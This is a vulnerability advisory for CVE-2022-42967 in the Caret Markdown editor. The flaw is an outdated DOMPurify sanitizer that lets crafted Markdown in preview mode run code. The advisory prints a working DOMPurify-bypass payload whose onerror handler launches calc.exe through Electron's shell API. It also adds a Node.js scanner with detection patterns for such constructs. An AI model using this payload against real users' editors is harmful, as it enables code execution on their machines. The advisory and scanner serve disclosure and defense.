
CVE-2022-42967: Caret XSS RCE

Caret is vulnerable to an XSS attack when the user opens a crafted Markdown file when preview mode is enabled. This directly leads to client-side code execution.


CVE-2022-42967 | CVSS 7.5

JFrog Severity: high

Published 10 Jan. 2023 | Last updated 10 Jan. 2023

XSS in Caret markdown editor leads to remote code execution when viewing crafted Markdown files

Caret Editor

All versions are affected

This issue is caused by insufficient validation of the document data that is sent to the Electron renderer, specifically in the getMarkdownHtmlElement function in the file app.asar/extensions/Markdown/Markdown.js:

t.firstChild.innerHTML = DOMPurify.sanitize(r)

An older version of DOMPurify is used, which has known filtering bypasses (see below).

Opening a document with the following contents, when preview mode is enabled, leads to the immediate execution of an arbitrary process (in this case, Calculator):

<form><math><mtext></form><form><mglyph><style></math><img src
onerror="try{ const {shell} = require('electron');
shell.openExternal('file:C:/Windows/System32/calc.exe') }catch(e){alert(e)}">

Disable Caret’s “Preview Mode”
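Because all versions are affected, untrusted Markdown files can also be triaged before they are opened in any previewing editor. The following is an added example, not part of the original advisory or of Caret: a heuristic Node.js scanner that flags raw HTML constructs of the kind the sample document relies on. The rule ids, verdict names and sample inputs are constructed for illustration, and a clean result does not prove a file is safe.

```javascript
// Added example: heuristic pre-open triage for Markdown files.
// Rule ids, verdict names and all sample text are constructed for illustration.
const RULES = [
  // Inline event handler inside a raw HTML tag, e.g. <img ... onerror=...>
  { id: 'event-handler-attr', re: /<[a-z][^>]*?\son[a-z]+\s*=/gi },
  // MathML/SVG elements, which the advisory's sample nests inside raw HTML
  { id: 'foreign-content-element', re: /<\s*(?:math|mtext|mglyph|svg)\b/gi },
  // <script> tags and javascript: URLs in HTML attributes or Markdown links
  { id: 'script-element-or-url',
    re: /<\s*script\b|(?:(?:href|src)\s*=\s*["']?|\]\()\s*javascript:/gi },
  // Node/Electron calls that only matter if the renderer has Node access
  { id: 'node-api-reference', re: /\brequire\s*\(|\bshell\.openExternal\b/g },
];

// 1-based line number of a character offset
function lineOf(text, index) {
  return text.slice(0, index).split('\n').length;
}

// Return every rule hit with its line, ordered by position in the file
function scanMarkdown(text) {
  const findings = [];
  for (const { id, re } of RULES) {
    for (const m of text.matchAll(re)) {
      findings.push({ rule: id, line: lineOf(text, m.index), match: m[0] });
    }
  }
  return findings.sort((a, b) => a.line - b.line);
}

// 'block' for active content, 'review' for weaker signals, else 'allow'
function verdict(text) {
  const hit = new Set(scanMarkdown(text).map((f) => f.rule));
  if (hit.has('event-handler-attr') || hit.has('script-element-or-url')) {
    return 'block';
  }
  return hit.size > 0 ? 'review' : 'allow';
}

// Constructed samples: plain notes, legitimate MathML, handler split across lines
const SAMPLES = {
  plain: '# Notes\n\nSome *text* with `inline code`.\n',
  mathml: 'Formula: <math><mi>x</mi></math>\n',
  handler: '# Doc\n\n<math><mtext><img src\nonerror="console.log(1)">\n',
};
for (const [name, text] of Object.entries(SAMPLES)) {
  console.log(name, verdict(text), scanMarkdown(text));
}
```

The scanner deliberately does not skip fenced code blocks, so documentation that quotes `require(` calls is reported as `review` rather than silently allowed.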

NVD
